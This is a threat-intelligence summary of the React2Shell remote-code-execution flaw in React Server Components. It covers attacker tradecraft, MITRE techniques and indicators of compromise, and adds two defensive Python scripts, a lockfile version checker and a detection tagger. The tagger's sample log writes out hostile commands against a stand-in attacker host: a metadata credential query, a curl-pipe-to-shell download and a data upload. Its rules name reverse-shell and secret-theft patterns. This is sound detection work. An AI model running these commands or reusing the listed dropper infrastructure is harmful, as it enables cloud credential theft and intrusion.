React2Shell (CVE-2025-55182) is a critical RCE in React Server Components that enables arbitrary code execution via improperly deserialized RSC payloads and has been widely exploited against internet-facing Next.js and other RSC-enabled platforms. In-the-wild activity includes opportunistic cryptomining, large-scale credential harvesting (including cloud metadata access), and operator-driven backdoors using Sliver implants. #React2Shell #Nextjs
Keypoints
- CVE-2025-55182 (“React2Shell”) is a deserialization-based RCE in React Server Components that allows arbitrary server-side code execution when malicious RSC payloads are parsed.
- Next.js is highly exposed (the next-action header makes the vulnerable flow trivially reachable), but the flaw also affects Waku, Vite (with RSC plugin), and custom/native React server implementations using the vulnerable decoder.
- Active exploitation observed in the wild includes quick pivoting from reconnaissance to interactive reverse shells, aggressive environment discovery, and exfiltration to attacker-controlled infrastructure.
- Attackers are harvesting developer and cloud credentials (scanning .env, .ssh, .aws, .kube, querying 169.254.169.254 for instance metadata) and bundling results for exfiltration.
- Multiple cryptomining campaigns leverage the bug (UPX-packed XMRig variants, stock XMRig pulls, installer scripts), and at least one campaign deployed Sliver-based backdoors for persistent operator-driven access.
- Proof-of-concept relies on gadget chains and the native Function() constructor during deserialization (self-references across chunks) to escalate a parsed payload into executed JavaScript code.
- Detection requires both dynamic scanning of exposed endpoints and static/code-level validation to find vulnerable React packages across frameworks and custom servers; remediation guidance is provided in the vendor/response blog post.
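The static/code-level check described above boils down to inventorying which copies of the RSC payload decoder are installed and comparing them against the fixed versions. The script below is an added example (not code from the Wiz write-up or from the React project): it reads a lockfileVersion 2/3 package-lock.json, lists every installed copy of the react-server-dom-* decoder packages (including nested copies under another dependency), and classifies each against a fixed-version table. The package list, the sample lockfile and the DEMO_PATCHED table are all constructed for the demo; the real fixed versions must be taken from the vendor advisory, which this summary does not reproduce.

```python
"""Inventory React Server Components (Flight) decoder packages from a
package-lock.json and classify them against a fixed-version table.
Added example, not code from the Wiz write-up or the React project."""
import json
import re

# Packages that ship the RSC payload decoder. Assumption: this list is
# illustrative; add whatever your framework (Waku, the Vite RSC plugin,
# a custom server) actually depends on.
RSC_PACKAGES = {
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
}

# PLACEHOLDER: the summary does not state the fixed versions. Fill this
# from the vendor advisory; with it empty every hit is reported "unknown".
PATCHED_MIN_VERSION = {}

_VER_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")


def parse_version(v):
    """Return (major, minor, patch) for a semver-ish string, else None."""
    m = _VER_RE.match(v or "")
    return tuple(int(x) for x in m.groups()) if m else None


def load_lock(path):
    """Read a package-lock.json from disk (lockfileVersion 2 or 3)."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def find_rsc_packages(lock):
    """Return [(install path, package name, version)] for every RSC decoder
    package, including nested copies such as node_modules/x/node_modules/y."""
    hits = []
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue  # "" is the root project entry, not a dependency
        name = path.rsplit("node_modules/", 1)[-1]
        if name in RSC_PACKAGES:
            hits.append((path, name, meta.get("version")))
    return hits


def assess(lock, patched=PATCHED_MIN_VERSION):
    """Classify each installed decoder copy as 'patched' (at or above the fixed
    version of its major.minor line), 'vulnerable' (same line, below the fix)
    or 'unknown' (line not in the table, or an unparseable version)."""
    verdicts = {}
    for path, name, version in find_rsc_packages(lock):
        v = parse_version(version)
        fixed = [parse_version(x) for x in patched.get(name, [])]
        same_line = [f for f in fixed if f and v and f[:2] == v[:2]]
        if v is None or not same_line:
            verdicts[path] = "unknown"
        elif v >= max(same_line):
            verdicts[path] = "patched"
        else:
            verdicts[path] = "vulnerable"
    return verdicts


# Constructed sample lockfile: a top-level decoder copy plus a nested one
# pulled in by another dependency. Versions here are made up for the demo.
SAMPLE_LOCK = json.loads("""
{
  "name": "demo-app",
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo-app", "version": "1.0.0"},
    "node_modules/react": {"version": "19.1.0"},
    "node_modules/react-server-dom-webpack": {"version": "19.1.0"},
    "node_modules/waku/node_modules/react-server-dom-webpack": {"version": "19.2.5"}
  }
}
""")

# CONSTRUCTED fixed-version table for the demo only; NOT the real fixes.
DEMO_PATCHED = {"react-server-dom-webpack": ["19.1.5", "19.2.2"]}

if __name__ == "__main__":
    for path, verdict in assess(SAMPLE_LOCK, DEMO_PATCHED).items():
        print(f"{verdict:10s} {path}")
```

Two caveats when running this against a real tree: Next.js bundles its own compiled copy of the decoder under next/dist/compiled rather than as a separate lockfile entry, so the installed next version itself has to be checked against the advisory as well; and lockfileVersion 1 files use a nested "dependencies" tree instead of the flat "packages" map and are not handled here.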
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The vulnerability is exploited for RCE against internet-facing Next.js and other RSC servers (‘critical Remote Code Execution (RCE) vulnerability in React’).
- [T1059] Command and Scripting Interpreter – Attackers obtain interactive shells and run one-liners, base64-encoded scripts, and tooling via curl/wget/nc (‘interactive reverse shells’ and ‘one-liners … sent back to attacker-controlled infrastructure via curl or nc’).
- [T1082] System Information Discovery – Adversaries collect system and environment details (whoami, hostname, env vars) to fingerprint compromised containers (‘whoami, hostname, environment variable dumps’).
- [T1083] File and Directory Discovery – Recursive scans of filesystem paths for config and keys target .env, JSON/YAML configs, SSH keys and other secrets (‘Recursively scans key filesystem paths (/home, /root, /etc, /var/www, /opt) for config and key material’).
- [T1071.004] Application Layer Protocol: DNS – DNS-based beaconing to oast*. domains is used to confirm execution and egress and to fingerprint targets (‘extensive use of oast*. domains and similar callback infrastructure’).
- [T1071.001] Application Layer Protocol: Web Protocols – Exfiltration and C2 use HTTP(S) endpoints and HTTP POST uploads to attacker infrastructure (‘Bundles all findings into a single report file and uploads it via HTTP POST to attacker-controlled infrastructure’).
- [T1105] Ingress Tool Transfer – Attackers retrieve and run external payloads (downloaders, XMRig, Sliver payloads) from attacker-controlled hosts (‘downloaded shell scripts from a dynamic DNS host that in turn fetched Sliver payloads (64-bit ELF binaries) and executed them’).
- [T1496] Resource Hijacking – Compromised containers are used to deploy cryptominers and hijack compute for Monero mining (‘cryptomining campaigns leveraging CVE-2025-55182’ and XMRig deployment examples).
- [T1053.005] Scheduled Task/Job: cron – Adversaries use nohup and disguised cron-like processes for persistence inside containers (‘using nohup /var/tmp/crond as a disguised persistence mechanism inside the container’).
- [T1005] Data from Local System – Attackers collect sensitive files and secrets from local paths (SSH keys, .aws, wallet data) for credential harvesting and lateral/cloud escalation (‘Targets common cloud/dev paths such as .ssh, .aws, .kube, .config/gcloud, and multiple cryptocurrency wallet locations’).
- [T1531] Cloud Instance Metadata Access – Adversaries attempt to retrieve IAM credentials from the instance metadata service to escalate cloud privileges (‘Attempts to access the cloud instance metadata service at 169.254.169.254/latest/meta-data/iam/security-credentials/’).
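The behaviours listed above (discovery one-liners, credential-path scans, IMDS queries, oast callbacks, curl-pipe-to-shell downloads, nohup persistence from a temp directory, HTTP POST uploads) are all visible in the command lines a Node.js process spawns, which is where a detection engineer would look first on a container running an RSC server. The block below is an added example, not code from the Wiz post: it runs a small set of rules over process command lines (for instance auditd EXECVE records or runtime logs already reduced to one command string per line) and tags each line with the behaviour it matches. The sample log lines, the hostnames (reserved .invalid and .example names) and the tag names are constructed for the demo.

```python
"""Tag process command lines with the post-exploitation behaviours described
in the React2Shell write-up. Added example, not code from the Wiz post."""
import re

# Tag names are descriptive labels chosen for this demo.
DISCOVERY = "system/environment discovery"
SECRETS = "credential path scan"
IMDS = "instance metadata access"
OAST = "oast callback"
INGRESS = "ingress tool transfer"
PERSIST = "nohup persistence from temp dir"
EXFIL = "http post upload"
REVSHELL = "reverse shell"

# (tag, pattern). Each pattern encodes one behaviour from the technique list;
# they are deliberately narrow so the demo stays readable, not exhaustive.
RULES = [
    # whoami / hostname / env as a standalone word (not the ".env" filename)
    (DISCOVERY, re.compile(r"(?:^|[\s;&|])(whoami|hostname|printenv|env)(?=$|[\s;&|])")),
    (SECRETS, re.compile(r"(?:\.env\b|\.ssh/|\.aws/|\.kube/|\.config/gcloud|id_rsa|id_ed25519)")),
    (IMDS, re.compile(r"169\.254\.169\.254")),
    (OAST, re.compile(r"\boast\w*\.\w+")),
    (INGRESS, re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")),
    (PERSIST, re.compile(r"\bnohup\b.*(/var/tmp|/tmp|/dev/shm)/")),
    (EXFIL, re.compile(r"\bcurl\b.*(-X\s*POST|--data|-d\s|-F\s)")),
    (REVSHELL, re.compile(r"/dev/tcp/|\bnc\b[^|]*\s-e\s")),
]


def classify(cmdline):
    """Return the list of tags whose pattern matches this command line."""
    return [tag for tag, pat in RULES if pat.search(cmdline)]


def scan(lines):
    """Return [(index, cmdline, tags)] for every line that matched a rule."""
    out = []
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            out.append((i, line, tags))
    return out


def summary(lines):
    """Return the sorted set of distinct behaviours seen across all lines,
    which is the quick triage question: how far along did the intrusion get?"""
    return sorted({t for _, _, tags in scan(lines) for t in tags})


# Constructed sample: one benign server start followed by a chain that mirrors
# the reported tradecraft. Hostnames use reserved .invalid/.example TLDs.
SAMPLE_LOG = [
    "node /app/node_modules/next/dist/bin/next start",
    "sh -c whoami; hostname; env",
    "sh -c curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "sh -c find /home /root /etc /var/www /opt -name .env -o -name id_rsa",
    "sh -c curl -s http://attacker.invalid/k1.sh | sh",
    "sh -c nohup /var/tmp/crond >/dev/null 2>&1 &",
    "sh -c curl -X POST -F report=@/tmp/report.tar.gz http://attacker.invalid/upload",
    "sh -c nslookup a1b2c3.oast.example",
]

if __name__ == "__main__":
    for idx, cmd, tags in scan(SAMPLE_LOG):
        print(f"[{idx}] {', '.join(tags):32s} {cmd}")
    print("behaviours seen:", summary(SAMPLE_LOG))
```

In production the parent process matters as much as the pattern: a shell spawned by the Node.js process serving RSC requests that then touches the metadata service or pipes curl into sh is a far stronger signal than the same command run by an operator's SSH session, so pair these tags with a parent-process condition before alerting.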
Indicators of Compromise
- [IP Address] malware/hosting/stealer infrastructure – 45.32.158.54 (malware host), 154.89.152.240 (dropper/check.sh), and 10+ other IPs observed in the appendix.
- [Domain] malware and loader infrastructure – anywherehost.site (malware infra/dropper), inerna1.site (malware infra/miner), and related domains (ax29g9q123.anondns.net, keep.camdvr.org, tr.earn.top).
- [URL] droppers, miners, and payloads – hxxp://anywherehost.site/xms/k1.sh (dropper), hxxp://keep.camdvr.org:8000/BREAKABLE_PARABLE5 (Sliver payload), and many other dropper/miner URLs listed in the appendix.
- [SHA1 Hash] scripts, miners, and Sliver binaries – 264e1a820b8b3bbd13325955f06aff2678c69935 (script), 0972859984decfaf9487f9a2c2c7f5d2b03560a0 (Sliver), and ~20+ additional SHA1s for scripts, miners, and payloads.
- [Monero Wallet] mining payout addresses – 44VvVLU2Vmja6gTMbhNHAzc7heYTiT7V… (Monero wallet), 42NTfUjbU3Gj536zubU7vpjfC7X9DPEC… (Monero wallet) referenced in the appendix.
- [File Name] payloads/runfiles used by attackers – systemd-devd.$(uname -m) (masqueraded miner binary), runner.zip (miner/loader), and other filenames observed in dropper URLs.
Read more: https://www.wiz.io/blog/nextjs-cve-2025-55182-react2shell-deep-dive